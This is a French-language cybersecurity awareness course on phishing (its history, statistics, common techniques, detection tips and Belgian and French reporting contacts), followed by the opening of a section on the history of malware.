| -------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------ |
| [Origines](/french/capsule-1-sensibilisation/phishing/phishing-histoire)         | [Décrit l'origine du phishing depuis la première attaque.](/french/capsule-1-sensibilisation/phishing/phishing-histoire)             |
| [Evolution](/french/capsule-1-sensibilisation/phishing/evolution)                | [L'évolution du phishing depuis la création de ce type d'attaque à nos jours.](/french/capsule-1-sensibilisation/phishing/evolution) |
| [Statistiques](/french/capsule-1-sensibilisation/phishing/phishing-statistiques) | [Les chiffres du phishing.](/french/capsule-1-sensibilisation/phishing/phishing-statistiques)                                        |
| [Techniques](/french/capsule-1-sensibilisation/phishing/phishing-techniques)     | [Les techniques de phishing utilisées par les cybercriminels.](/french/capsule-1-sensibilisation/phishing/phishing-techniques)       |
| [Protection](/french/capsule-1-sensibilisation/phishing/phishing-protection)     | [Comment détecter un phishing, se protéger et porter plainte.](/french/capsule-1-sensibilisation/phishing/phishing-protection)       |


# Phishing - Origines

## Etymologie&#x20;

Les escroqueries par **hameçonnage** utilisent des mails et des sites Web usurpés comme appâts pour inciter les gens à communiquer volontairement des informations sensibles. Le terme **phishing** est donc la contraction des mots anglais « *fishing* » qui signifie pêche et « *phreaking* » qui désigne l'exploration, l'expérimentation et l'étude des systèmes de télécommunication.

![](/files/-MkW8YNIcSC3ZRGl-dSm)

## Phishing sur America Online

Dans les années 90, [AOL](https://fr.wikipedia.org/wiki/AOL), anciennement appelé America Online, était l'un des principaux fournisseurs de services Internet et comptait plus d'un million de clients abonnés à son service. Cette popularité massive d'AOL a attiré l'attention des pirates informatiques. Les personnes faisant le commerce de logiciels et d'outils piratés et illégaux utilisaient AOL pour leurs communications.

![Logo du fournisseur AMERICA ONLINE](/files/-MkWsZvpQLO3rhFanmYD)

Les phishers (hameçonneurs en français) ont d'abord mené des attaques en volant les mots de passe des utilisateurs et en utilisant des algorithmes pour créer des numéros de carte de crédit aléatoires. Si les chances de succès étaient rares, ils ont quand même touché le jackpot assez souvent et causer de gros dégâts. Les numéros de carte de crédit aléatoires étaient utilisés pour ouvrir des comptes AOL. Ces comptes étaient ensuite utilisés pour **spammer** d'autres utilisateurs et pour pleines d’autres escroqueries.

{% hint style="info" %}
**Spammer**: *Anglicisme*. Envoyer des messages électroniques en masse à des personnes qui ne l’ont pas demandé dans un but publicitaire ou commercial. (Définition de "[LeRobert](https://dictionnaire.lerobert.com/definition/spam)")&#x20;
{% endhint %}

AOL a mis fin à cette pratique en 1995, lorsque la société a mis en place des mesures de sécurité pour empêcher l'utilisation de numéros de cartes de crédit générés de manière aléatoire.

### Nouvelle technique contre AOL

Après avoir mis fin à leur extorsion de cartes de crédit, les **hameçonneurs** ont créé ce qui allait devenir un ensemble de techniques très courantes et durables. Par le biais des systèmes de messagerie instantanée et de courrier électronique d'AOL, ils envoyaient des messages aux utilisateurs en se faisant passer pour des employés d'AOL.

Ces messages demandaient aux utilisateurs de **vérifier leur compte** ou de **confirmer leurs informations de facturation**. Le plus souvent, les gens tombaient dans le panneau ; après tout, rien de tel n'avait jamais été fait auparavant. Le problème s'est intensifié lorsque les hameçonneurs ont créé des comptes AIM ([AOL Instant Messenger](https://fr.wikipedia.org/wiki/AOL_Instant_Messenger)) par le biais d'Internet ; ces comptes ne pouvaient pas être "punis" par le service des conditions d'utilisation d'AOL.&#x20;

{% hint style="info" %}
**AOL Instant Messenger (AIM)**: Un programme informatique de messagerie instantanée et de présence créé par AOL, qui permet aux utilisateurs enregistrés de communiquer en temps réel.
{% endhint %}

![Message instantané sur AIM pour une des dernières versions disponibles](/files/-MkXAq_RnXJZvNCPzf7G)

Finalement, AOL a été contraint d'inclure des avertissements sur ses clients de messagerie électronique et de messagerie instantanée pour empêcher les gens de fournir des informations sensibles par ce biais.


# Phishing - Evolution

## Années: 2003 - 2004

Fin 2003, des hameçonneurs ont enregistré des dizaines de domaines qui ressemblaient à des sites légitimes comme eBay et PayPal. Ils ont utilisé des programmes de messagerie pour envoyer des courriels frauduleux aux clients de PayPal. Ces clients étaient dirigés vers des sites pirates et invités à mettre à jour les données de leur carte de crédit et d'autres informations d'identification.

![Mail de phishing qui utilise le nom de Paypal et qui redirige vers un site frauduleux](/files/-MkXGr9O24q_IATOCu6s)

Au début de l'année 2004, les hameçonneurs ont connu un succès considérable, notamment en attaquant des sites bancaires et leurs clients. Des fenêtres pop-up étaient utilisées pour obtenir des informations sensibles des victimes.

## Années: 2004 2005

Entre mai 2004 et mai 2005, environ 1,2 million d'utilisateurs aux États-Unis ont subi des pertes causées par le phishing, pour un total d'environ 929 millions de dollars. Les organisations perdent environ 2 milliards de dollars par an à cause du phishing.

Le phishing est officiellement reconnu comme une partie totalement organisée du marché noir. Des logiciels spécialisés capables de traiter les paiements par hameçonnage apparaissent à l'échelle mondiale, ce qui permet d'externaliser un risque énorme. Ces logiciels sont mis en œuvre dans des campagnes de phishing par des bandes criminelles organisées.

## Année: 2008

Fin 2008, le bitcoin et d'autres crypto-monnaies sont lancés. Les transactions effectuées à l'aide de logiciels malveillants peuvent ainsi être sécurisées et anonymes, ce qui change la donne pour les cybercriminels.


# Phishing - Statistiques

## Crise et Phishing

Avec la pandémie et la crise de l’année 2020, les attaques d’hameçonnage ont considérablement augmenté dans le monde. Les cybercriminels en ont profité pour tromper et arnaquer les victimes en utilisant l’actualité.

### Les chiffres dans le monde

#### FBI

Selon le FBI (Federal Bureau of Investigation) dans leur rapport [**Internet Crime Report 2020**](https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf), le phishing était le type de cybercriminalité le plus courant en 2020, et les incidents de phishing ont presque doublé en fréquence, passant de 114 702 incidents en 2019, à 241 324 incidents en 2020.

#### Phishing et société

Le rapport de phishing de [**KnowBe4** ](https://www.knowbe4.com/hubfs/2020%20Phishing%20Benchmark%20Report%20Slides.pdf)a révélé que les principaux secteurs à risque varient en fonction de la taille de l'entreprise, mais qu'il ressort également que les soins de santé et l'industrie manufacturière figurent parmi les secteurs les plus ciblés, aux côtés de l'éducation, de la construction, des sociétés de services et de la technologie.

![Statistiques 2020 de KnowBe4](/files/-MkZH2X5vfkul6hmD-JF)

#### Belgique

En 2020 du côté de la Belgique, le nombre d'enregistrements en matière de phishing a connu une augmentation sans précédent : 7424 procès-verbaux ont été rédigés, soit trois fois plus qu'en 2019. Cette forte augmentation s’est surtout manifestée au début de la crise du coronavirus, pendant les mois de mars et d'avril de l'année dernière, avant de baisser légèrement au cours de l'été et de fluctuer autour de 700 signalements par mois à l'automne.

![Statistiques belges sur les cas de phishing enregistré](/files/-MkZHeTISuApj_haV2cm)

## TOP 10 de 2020

Les chercheurs de Check Point ont publier dans leur rapport "[Brand Phishing Report Q2 2021](https://blog.checkpoint.com/2021/07/15/brand-phishing-report-q2-2021-microsoft-continues-reign/)" leur liste des 10 premières marques les plus usurpés durant un phishing pour le deuxième trimestre de 2021.

Microsoft a de nouveau été la marque la plus fréquemment ciblée par les cybercriminels, comme au premier trimestre de 2021 et au dernier de 2020.&#x20;

![Les marques les plus utilisées durant les attaques de phishing au premier et deuxième trimestre de 2021](/files/-MkiufNL4n7krVr0W4Oc)

Le podium est donc le suivant pour le deuxième trimestre de 2021:

1. Microsoft 45%&#x20;
2. DHL 26%&#x20;
3. Amazon 11%&#x20;
4. Bestbuy 4%&#x20;
5. Google 3%&#x20;
6. Linkedin 3%&#x20;
7. Dropbox 1%&#x20;
8. Chase 1%&#x20;
9. Apple 1%&#x20;
10. Paypal 1%


# Phishing - Techniques

Il existe un certain nombre de techniques différentes utilisées pour obtenir des informations personnelles des utilisateurs. À mesure que la technologie progresse, les techniques utilisées par les cybercriminels sont également plus avancées.&#x20;

Pour prévenir l’hameçonnage sur Internet, les utilisateurs doivent savoir comment les criminels s'y prennent et connaître les techniques anti-hameçonnage pour éviter d'en être victimes.&#x20;

Cette section présentera les techniques les plus répandues.

## Spray-and-Pray

{% hint style="success" %}
Le « **Spray-and-Pray** » (Traduction littéraire: Vaporiser et prier) qui est la technique par définition d'hameçonnage, consiste à envoyer le même mail au maximum d'utilisateurs en leur demandant de remplir des données personnelles.&#x20;
{% endhint %}

![](/files/-Ml0LR3TjWqSYLIe_0S4)

La technique de phishing la plus courante.&#x20;

Ces informations seront utilisées par les cybercriminels pour leurs activités illégales. La plupart des messages comportent une note urgente qui demande à l'utilisateur de saisir des informations d'identification pour mettre à jour, modifier ou vérifier les données du compte. Parfois, la victime peut être invité à remplir un formulaire pour accéder à un nouveau service par le biais d'un lien fourni dans l'e-mail, par exemple un nouveau compte Amazon, Netflix ou autre.

### Exemples

#### Mail de la police nationale belge:

![Mail de phishing qui demande de payer une fausse amende.](/files/-Ml-MTC9QSfYqinD94rN)

#### Mail de bpost:

![Faux mail bpost.](/files/-Ml-MtDX4H6nFQCgYQyN)

#### Mail du gouvernement français:

![Mail du gouvernement français qui annonce un retour des impôts.](/files/-Ml-O08jFS4b-T5gds5x)

## Spear Phishing&#x20;

{% hint style="success" %}
Le « **spear phishing** » (harponnage) est un mail ciblant une personne ou un service spécifique au sein d'une organisation et qui semble provenir d'une source fiable. Il s'agit en fait de cybercriminels qui tentent de voler des informations confidentielles de la cible en question.
{% endhint %}

![](/files/-Ml0KIx_RU_lDmkBo8l-)

Le spear phishing est une méthode de hameçonnage ultra ciblée par laquelle les cybercriminels se font passer pour une source de confiance afin de convaincre les victimes de divulguer des données confidentielles, des informations personnelles ou d'autres détails sensibles. Le cybercriminel utilisera ensuite ces informations à des fins malveillantes, notamment pour des vols d'identité ou des violations de données.

Les spécialistes du spear phishing s'attaquent souvent à leurs victimes par le biais d'e-mails ciblés, de médias sociaux, d'applications de messagerie directe et d'autres plateformes en ligne. La force de ces cyberattaques réside dans le fait qu'elles sont conçues sur mesure pour les victimes et qu'elles privilégient la qualité à la quantité contrairement au phishing ([spray-and-pray](/french/capsule-1-sensibilisation/phishing/phishing-techniques#spray-and-pray)).

### Exemples

#### Mail personnel:

![](/files/-Ml0RYLjJVJ2nXAGcOiW)

## Phishing via les moteurs de recherche

{% hint style="success" %}
Le « **phishing via les moteurs de recherche** » se produit par le biais des moteurs de recherche de sites Web en ligne. La personne peut y trouver des offres ou des messages qui l'incitent à visiter le site Web. Le processus de recherche peut être légitime, mais le site Web est en fait faux et n'existe que pour voler les informations personnelles de la personne.
{% endhint %}

![](/files/-Ml2WineTfakI0-y712k)

Certaines escroqueries par hameçonnage impliquent des moteurs de recherche où l'utilisateur est dirigé vers des sites qui peuvent offrir des produits ou des services à bas prix par exemple. Lorsque l'utilisateur essaie d'acheter le produit en saisissant les données de sa carte de crédit, ceux-ci sont collectés par le site de phishing. Il existe de nombreux sites de fausses banques qui proposent aux utilisateurs des cartes de crédit ou des prêts à bas prix, mais il s'agit en fait de sites frauduleux.

### Exemples

Voici quelques-unes des ruses courantes utilisées par les sites pour attirer les victimes :

* **Remise exceptionnelle/offre gratuite**

  Ces sites semblent être des commerçant en ligne typiques, mais les produits sont faux et si vous commandez quelque chose, vous ne le recevrez jamais. Au lieu de cela, les fraudeurs en ligne prendront votre argent et probablement aussi votre identité.

* **Taux d'intérêt bas/carte de crédit gratuite**&#x20;

  Méfiez-vous des institutions bancaires proposant des taux incroyablement bas. Il s'agit probablement de faux sites conçus pour vous inciter à vous inscrire ou même à transférer de l'argent provenant d'autres sources.

* **Offre d'emploi**

  Une recherche d'emploi en ligne peut faire apparaître de fausses offres d'entreprises qui n'existent pas. La candidature demandera des informations personnelles, par exemple un numéro d'assurance nationale ou des coordonnées bancaires. Aucune entreprise ne devrait avoir besoin de ces informations avant de vous embaucher.

* **Avertissements d'urgence**

  Certains sites utilisent des avertissements d'urgence pour inciter les clients à télécharger leurs produits. Des fenêtres pop-up vous indiquent que votre ordinateur a été infecté par un logiciel malveillant ou que votre abonnement à un antivirus est périmé.

{% hint style="info" %}
Pop-up: De l'anglais "*to pup up*" qui signifie surgir.  Une pop-up parfois appelée **fenêtre intruse, fenêtre surgissante** ou **fenêtre publicitaire**, est une fenêtre secondaire qui s'affiche, sans avoir été sollicitée par l'utilisateur, devant la fenêtre de navigation principale lorsque l'on navigue sur Internet. (Définition: [Wikipédia](https://fr.wikipedia.org/wiki/Pop-up))
{% endhint %}

## Vishing

{% hint style="success" %}
&#x20;Le « **vishing** » vient de deux mots anglais : Voice (voix) et phishing. C’est une technique de phishing qui nécessite de passer par un appel téléphonique.&#x20;
{% endhint %}

![](/files/-Ml2WKVkwyUy-WFUzF-6)

Le vishing consiste à convaincre les victimes qu'elles font le bon choix en répondant à l'appelant. Souvent, la personne qui téléphone prétend qu'il s'agit d'un appel du gouvernement, du service des impôts, de la police ou de la banque de la victime.

### Exemples

1. **Télémarketing**

   Ces cybercriminels prétendent appeler d'une entreprise légitime comme une entreprise dont vous êtes déjà client ou une entreprise qui propose des offres auxquelles vous ne pouvez pas résister.&#x20;

   Par exemple:

   * Une agence de voyage qui vous offre des vacances gratuites, tous frais payés.
   * Une loterie qui vous appelle pour vous annoncer que vous avez gagné un prix, même si vous n'avez jamais participé au concours.

2. **Fraude gouvernementale**

   Dans ce type d'attaque par hameçonnage vocal, les escrocs prétendent appartenir à une agence gouvernementale comme le Service public fédéral Finances (SPF Finances) ou la police. Ils jouent avec votre peur et votre sentiment d'urgence, en vous disant que vous leur devez de l'argent et que vous devez les rembourser immédiatement. Sinon, vous serez condamné à une amende ou pire.

3. **Résoudre un problème avec votre compte**

   Un appelant qui prétend être de votre banque ou d'une autre organisation avec laquelle vous faites affaire, explique qu'il y a un problème avec l'accès à votre compte, un paiement que vous avez récemment effectué, des transactions suspectes ou peut-être un remboursement qui vous est dû. L'appelant demande des informations, telles que votre code d'accès ou votre numéro de compte, pour résoudre le problème.

## Smishing

{% hint style="success" %}
Le « **smishing** » vient de SMS et phishing. C'est une pratique frauduleuse qui consiste à envoyer des messages textuels prétendant provenir d'entreprises réputées afin d'inciter les personnes à révéler des informations personnelles, telles que des mots de passe ou des numéros de carte de crédit.
{% endhint %}

Hameçonnage réalisé par l'intermédiaire de SMS (Short Message Service), un service de messagerie textuelle par téléphone.

La tromperie et la fraude sont les éléments essentiels de toute attaque de phishing par SMS. Comme le cybercriminel adopte une identité à laquelle vous pourriez faire confiance, vous êtes plus susceptible de succomber à ses demandes.

### Exemples

#### SMS de la part de bpost:

![](/files/-Ml5MNie6jLWdKRhm53l)

#### SMS de la part de BASE:

![](/files/-Ml5MdTSLPJf63hWe7yN)

#### SMS pour une étude COVID en France:

![](/files/-Ml5MmxsVBEq4w8wpbfz)


# Phishing - Protection

Les cybercriminels utilisent des mails ou des SMS pour vous inciter à leur fournir des informations personnelles. Ils peuvent tenter de voler vos mots de passe, vos numéros de compte ou toute autre information sensible. S'ils obtiennent ces informations, ils pourraient avoir accès à votre courrier électronique, à votre compte bancaire ou à d'autres comptes. Chaque jour, les escrocs lancent des milliers d'attaques d'hameçonnage de ce type et elles sont souvent couronnées de succès.

Les cybercriminels changent parfois de stratégie, mais il existe certains indices qui vous aideront à identifier le message ou l'e-mail frauduleux.

## Détecter un phishing

Tout le monde est susceptible d'être victime d'une attaque de phishing. Souvent, les mails de phishing sont bien conçus et il faut un œil exercé pour distinguer le vrai du faux. 👀

![](/files/-Ml9TLM3uOuMKqF6m0Tv)

### 1. Nom et adresse mail

Les adresses électroniques et les noms de domaine peuvent être facilement usurpés. Il est donc essentiel de vérifier que le nom de domaine n'est pas altéré par des modifications orthographiques dans les courriels suspects. Même s'ils semblent provenir d'un expéditeur de confiance, vérifiez toujours deux fois.

![Adresse mail frauduleuse.](/files/-MlBVS2KsSlkyuEQTLLg)

### 2. Vérifier les fautes d'orthographe

Les cybercriminels sont souvent moins soucieux d'être grammaticalement corrects. Cela signifie que les fautes de frappe et d'orthographe sont souvent évidentes dans les messages. De telles erreurs dans un courriel peuvent être une bonne indication que le message n'est pas authentique.

![Faites attention aux fautes de français dans les mails.](/files/-MlB_lOnx_F8WHMkdui5)

### 3. Ne partagez pas d'informations sensibles à la hâte

Tout mail demandant des informations sensibles sur vous ou votre entreprise est suspect. Par exemple, aucune banque ne demandera jamais d'informations personnelles par courrier électronique. Appelez directement votre banque pour vérifier si un courriel est authentique ou non.

![Faire attention aux informations qui vous sont demandées par mail.](/files/-MlEMhICyoBF5LoepLwn)

### 4. Ne vous laisser pas avoir par le côté URGENT

Les attaques de phishing utilisent des tactiques de peur telles que l'urgence et l'autorité pour inciter les victimes à agir immédiatement. Les mails qui demandent de partager des informations personnelles ou d'effectuer des transactions en espèces sont des pièges !

![L'urgence de la fermeture du compte peut vous pousser à réagir au mail.](/files/-MlGgcBW1Ce0WXxpp1fg)

### 5. Survoler sans cliquer sur les liens

Passez la souris sur les URL. Si le texte alternatif ne correspond pas au texte affiché, ou s'il semble étrange, **NE cliquez PAS dessus**.

![Le lien envoie vers une fausse adresse.](/files/-MlHSx3r6DQ8Tcie8M9l)

### 6. Faire attention aux pièces jointes

Passez la souris sur les pièces jointes pour vérifier si elles contiennent un lien réel, avant de cliquer dessus ou de les télécharger. Mais si vous n'êtes toujours pas sûr de l'expéditeur, ne cliquez pas sur le lien ou sur le fichier.

### 7. Est-ce que le mail est trop beau pour être vrai ?

Si cela semble trop beau pour être vrai, il y a de fortes chances que ce soit le cas ! Les attaques de phishing utilisent de fausses récompenses pour inciter les victimes à agir. Vous ne gagneriez pas à la loterie si vous ne participiez jamais.

![](/files/-MlHYOXPjFn1xFOz-GyB)

### 8. Garder vos appareils à jour

Les appareils, et les applications qu'ils contiennent, sont plus vulnérables aux attaques lorsque les systèmes ne sont pas mis à jour. Maintenez votre antivirus à jour et vérifiez régulièrement les mises à jour de vos appareils.

### 9. Vérifier régulièrement vos comptes

Vérifiez régulièrement vos comptes pour vous assurer qu'aucune modification n'a été effectuée à votre insu. En restant au courant de vos comptes et en sachant quelles données sont conservées sur chacun d'eux, il sera plus facile de repérer une attaque de phishing.

### 10. Si un doute persiste, contacter les bonnes personnes

Si vous pensez avoir été victime d'une attaque de phishing, il existe plusieurs points de contact si vous êtes particuliers. (Cf: [**Points de contact**](/french/capsule-1-sensibilisation/phishing/phishing-protection#points-de-contact))

Si vous êtes victime de phishing sur votre lieu de travail, parlez-en directement à votre équipe cybersécurité, IT ou votre manager.

## Points de contact

### Belgique

* Le CCB (Centre pour la Cybersécurité Belgique) a mis en place une adresse mail&#x20;

  <suspect@safeonweb.be> pour signaler volontairement les mails de phishing.

{% hint style="info" %}
" Le but de <suspect@safeonweb.be> est simple : nous faisons appel aux internautes pour qu’ils signalent volontairement à cette adresse les messages suspects qu’ils reçoivent, les fameux messages de phishing. Nous contrôlons alors les URL et les annexes de ces messages envoyés. C’est un processus automatisé. Nous faisons bloquer les liens suspects. Ce dispositif permet de protéger les internautes moins vigilants qui ont cliqué sur le lien."&#x20;

Source: [**Safeonweb.be**](https://www.safeonweb.be/fr/quest-ce-que-suspectsafeonwebbe)
{% endhint %}

* Le SPF Economie a mis en place un point de contact pour toutes les fraudes, tromperies, arnaques et escroqueries via le lient suivant: <https://pointdecontact.belgique.be/meldpunt/fr/bienvenue>

{% hint style="info" %}
Lorsque vos droits en tant que consommateur ou entreprise ont été violés ou que vous êtes victime d’une forme de tromperie, vous pouvez le signaler via ce nouveau site. Le point de contact donne un avis sur mesure et vous oriente vers l’instance appropriée.

Le point de contact est le résultat de la collaboration entre l’Agence fédérale pour la sécurité de la chaîne alimentaire (AFSCA), l’Agence fédérale des médicaments et des produits de santé (AFMPS), le Service d’information et de recherche sociale (SIRS), la Police fédérale, le SPF Finances et le SPF Economie.

Source: [**Police.be**](https://www.police.be/5998/fr/questions/prevention/point-de-contact-pour-fraudes-tromperies-arnaques-et-escroqueries)
{% endhint %}

### France

#### Cybermalveillance

Le gouvernement français à mis en place le site suivant:

* [**Cybermalveillance.gouv.fr**](https://www.cybermalveillance.gouv.fr/) a pour missions d'assister les particuliers, les entreprises, les associations, les collectivités et les administrations victimes de cybercriminalité, de les informer sur les menaces numériques et les moyens de s'en protéger.

Sur ce site, il y a une[ partie dédiée au phishing et comment réagir lorsque vous êtes victimes](https://www.cybermalveillance.gouv.fr/tous-nos-contenus/fiches-reflexes/hameconnage-phishing).

{% hint style="info" %}

1. **Au moindre doute, contactez l’organisme concerné :** en cas de doute, contactez si possible directement l’organisme concerné pour confirmer le message ou l’appel que vous avez reçu.
2. **Faites opposition immédiatement :** si vous avez malencontreusement communiqué des éléments sur vos moyens de paiement ou si vous avez constaté des débits frauduleux sur votre compte, faites opposition immédiatement auprès de votre organisme bancaire ou financier.
3. **Conservez les preuves** et, en particulier, le message d’hameçonnage reçu.
4. **Déposez plainte :** si vous avez constaté que des informations personnelles servent à usurper votre identité ou si vous constatez des débits frauduleux sur vos comptes bancaires, **déposez plainte** au [commissariat de police ou à la brigade de gendarmerie](https://www.interieur.gouv.fr/Contact/Contacter-une-brigade-de-gendarmerie-ou-un-commissariat-de-police) dont vous dépendez. Vous pouvez également adresser votre plainte par écrit au [procureur de la République du tribunal judiciaire](https://www.service-public.fr/particuliers/vosdroits/R11469) dont vous dépendez en fournissant toutes les preuves en votre possession.

   Si vous êtes un particulier, vous pouvez être accompagné gratuitement dans cette démarche par une association de [France Victimes](https://www.france-victimes.fr/) au 116 006 (appel et service gratuits), numéro d’aide aux victimes du ministère de la Justice. Service ouvert 7 jours sur 7 de 9h à 19h.
5. **Changez immédiatement vos mots de passe :** si vous avez malencontreusement communiqué un mot de passe, changez-le immédiatement sur le site ou service concerné, ainsi que sur tous les autres sites ou services sur lesquels vous utilisiez ce mot de passe compromis.
6. **Signalez tout message ou site douteux à Signal Spam:** si vous avez reçu un message douteux, ne cliquez par sur les pièces jointes ou sur le lien suspect. Si le message comporte un lien, positionnez le curseur de votre souris sur ce lien (sans cliquer). Cela affichera alors la véritable adresse vers laquelle il redirige afin d’en vérifier la vraisemblance.\
   Si vous avez cliqué sur le lien, vérifiez l’adresse du site Internet qui s’affiche dans votre navigateur. Si cela ne correspond pas exactement au site concerné, c’est très certainement un site frauduleux. Parfois, un seul caractère peut changer dans l’adresse du site pour vous tromper.\
   Ne répondez pas à ces messages suspects et signalez-les à [**Signal Spam**](https://www.signal-spam.fr/) qui est associé à la CNIL pour identifier les principaux émetteurs de spams et mener les actions de luttes nécessaires.
7. **Signalez l’adresse d’un site d’hameçonnage à Phishing Initiative :** vérifiez l’adresse du site Internet qui s’affiche sur votre navigateur. Si elle ne correspond pas exactement au site concerné, il s’agit très certainement un site frauduleux. Parfois, un seul caractère peut changer dans l’adresse du site pour vous tromper. Face à un site suspect, vous pouvez le signaler à [**Phishing Initiative**](https://phishing-initiative.fr/contrib/) qui bloquera l’adresse de ce site et demandera sa suppression.
8. **Besoin de plus de conseils ?** \
   Pour être conseillé dans vos démarches, contactez la plateforme [Info Escroqueries](https://www.police-nationale.interieur.gouv.fr/Actualites/Dossiers/Info-Escroqueries) du ministère de l’Intérieur au 0 805 805 817 (appel et service gratuits de 9h à 18h30 du lundi au vendredi).

Source: [**Cybermailvaillance.gouv.fr**](https://www.cybermalveillance.gouv.fr/tous-nos-contenus/fiches-reflexes/hameconnage-phishing)
{% endhint %}

* La [**CNIL** ](https://www.cnil.fr/)(Commission nationale de l'informatique et des libertés) indique comment réagir face au SMS de phishing:

{% hint style="info" %}
Vous pouvez transférer le SMS abusif au numéro **33700**. Il s'agit d'un dispositif d'alerte par SMS créé par les opérateurs télécoms, les éditeurs de services et les hébergeurs, en concertation avec le Secrétariat d'Etat chargé de l'Industrie et de la Consommation.

Après ce transfert, vous recevrez un message vous demandant d'envoyer au 33700 le numéro depuis lequel vous avez reçu le SMS abusif. Ces informations sont transmises aux opérateurs, y compris le vôtre, qui pourront agir rapidement auprès des organismes à l'origine de ces sms.

L'envoi d'un SMS au 33700 est gratuit pour les clients Bouygues Telecom, Orange et SFR. Pour les autres opérateurs, l'envoi d'un SMS au 33700 peut s'effectuer au prix d'un SMS normal.

Pour plus d'informations, vous pouvez vous connecter sur [www.33700-spam-sms.fr](http://www.33700-spam-sms.fr/)

Source: [**CNIL.fr**](https://www.cnil.fr/fr/spam-phishing-arnaques-signaler-pour-agir)
{% endhint %}

&#x20;


# Malware

Cette première partie définira le malware, expliquera son origine ainsi que son évolution au cours des années, et donnera les indications pour se protéger et détecter une attaque.

## Définition et Contexte

{% hint style="success" %}
Un **logiciel malveillant** ou **malware** est un logiciel conçu intentionnellement pour perturber un ordinateur, un serveur, un client ou un réseau informatique, divulguer des informations privées, obtenir un accès non autorisé à des informations ou à des systèmes, priver les utilisateurs de l'accès à des informations ou qui, à son insu, porte atteinte à la sécurité informatique et à la vie privée de l'utilisateur.

Définition: [**MICROSOFT** ](https://docs.microsoft.com/en-us/previous-versions/tn-archive/dd632948\(v=technet.10\)?redirectedfrom=MSDN)
{% endhint %}

![](/files/dpuKN9AvETdtVPlDbC6R)

Hostiles, intrusifs et intentionnellement méchants, les logiciels malveillants cherchent à envahir, endommager ou désactiver les ordinateurs, systèmes informatiques, réseaux, tablettes et appareils mobiles, souvent en prenant le contrôle partiel des opérations d'un appareil. Comme la grippe humaine, il interfère avec le fonctionnement normal.


# Malware - Origines

## Etymologie

En tant que logiciel conçu pour perturber le fonctionnement normal d'un ordinateur, les logiciels malveillants sont un terme général désignant les virus, chevaux de Troie et autres programmes informatiques destructeurs utilisés par les acteurs de la menace pour infecter les systèmes et les réseaux afin d'accéder à des informations sensibles ou encore de bloquer le système complètement.&#x20;

Le mot malware vient de l'anglais MALICIOUS SOFTWARE qui signifie "Logiciel malveillant". En français, on retrouve le terme Maliciel qui est le raccourci de Logiciel Malveillant.&#x20;

![](/files/2Q0KHqf8uYoMGgxyspnV)

Les premiers logiciels malveillants étaient primitifs, se propageant souvent entièrement hors ligne via des disquettes transportées d'ordinateur en ordinateur par des mains humaines. Avec le développement des réseaux et de l'internet, les auteurs de logiciels malveillants n'ont pas tardé à adapter leur code malveillant et à tirer parti de ce nouveau moyen de communication.

Voici une liste représentative de quelques-unes des premières versions importantes de logiciels malveillants et de leur impact sur le monde.

## Creeper - 1971

Un réseau informatique expérimental, **ARPANET**, a été créé en 1969 et a été le précurseur de l'internet. Il a été conçu pour envoyer des communications d'ordinateur à ordinateur sur de longues distances, sans qu'il soit nécessaire d'établir une connexion téléphonique dédiée entre chaque ordinateur. Pour y parvenir, il fallait une méthode de division et d'envoi des données, connue aujourd'hui sous le nom de commutation par paquets. Ses premiers utilisateurs, peu nombreux, étaient pour la plupart des informaticiens.&#x20;

{% hint style="info" %}
**ARPANET**:

De l'anglais "Advanced Research Projects Agency Network" est l'acronyme du premier réseau à transfert de paquets de données conçu aux États-Unis par la Defense Advanced Research Projects Agency (DARPA). Le projet fut lancé en 19662, mais ARPANET ne vit le jour qu'en 1969. Sa première démonstration officielle date d'octobre 1972.

En 1983, le protocole TCP/IP (Internet Protocol) a remplacé le protocole NCP en tant que protocole principal d'ARPANET. L'ARPANET est alors devenu un sous-réseau du premier Internet.

Définition: WIKIPEDIA
{% endhint %}

Imaginez leur surprise lorsqu'un jour de 1971, les écrans des ordinateurs reliés par télétype affichent la phrase : “**I’m the creeper, catch me if you can!**”.

![](/files/x4H0efHy0JNrH8LstzMs)

Sans le savoir à l'époque, ils étaient les premières victimes d'un virus informatique.&#x20;

**Mais que signifiait ce mystérieux message, et qui l'a envoyé ?**

Il s'avère que ce n'est pas un pirate informatique qui a codé le premier virus informatique, et qu'il n'a pas été envoyé dans une intention malveillante. [**Bold, Beranek et Newman**](https://fr.wikipedia.org/wiki/Bolt,_Beranek_and_Newman) (aujourd'hui Raytheon BBN Technologies) étaient les pionniers des réseaux de commutation par paquets comme ARPANET et Internet. L'un de ses chercheurs, Bob Thomas, avait créé Creeper comme programme informatique expérimental.

Creeper était un ver - un type de virus informatique qui se réplique et se propage à d'autres systèmes. Dans ce cas, ses cibles étaient les ordinateurs de la [**Digital Equipment Corporation**](https://fr.wikipedia.org/wiki/Digital_Equipment_Corporation) (DEC) qui étaient reliés à ARPANET.

Mais il ne s'agissait pas d'un logiciel malveillant tel que nous l'associons aux virus informatiques actuels ; Creeper ne faisait qu'afficher son message énigmatique. Il ne chiffrait pas les fichiers, ne demandait pas de rançon, ne détruisait pas les données, et ne volait pas d'information. Il n'a fait qu'afficher son défi provocateur.

Son créateur avait simplement voulu créer un programme expérimental qui s'autodétruisait pour montrer que c'était possible. S'il l'a fait avant tout par curiosité scientifique, il s'est également amusé à lui donner un nom: **Creeper** était un mystérieux braqueur de banque vert et macabre dans le célèbre dessin animé des années 70, "Scooby-Doo".

![Jeepers it's the creeper - Scooby-Doo](/files/m79CbrbYUQLzpfeIzWj2)

### La naissance de Reaper&#x20;

Le développement du virus Creeper a donné naissance à Reaper de [**Ray Tomlinson**](https://fr.wikipedia.org/wiki/Ray_Tomlinson), le premier logiciel antivirus conçu pour arrêter les menaces de ce type. Il est intéressant de noter que Reaper est lui-même un ver informatique programmé pour supprimer toutes les instances de Creeper dans les ordinateurs infectés.


# Malware - Evolution

Depuis Creeper à aujourd'hui, plusieurs malware ont vu le jour.&#x20;

Dans cette section, un petit parcourt de l'histoire et l'évolution des malwares au fil du temps.

Cette liste est bien sûre non exhaustive, il existe tellement de malwares différents ! :smile:

Un sommaire des malwares se trouve ICI :smile:

## Années: 1970 - 1999

### 1975 - ANIMAL

Un programme appelé **ANIMAL**, publié en **1975**, est généralement considéré comme le premier exemple au monde d'une attaque de type "**CHEVAL DE TROIE**".&#x20;

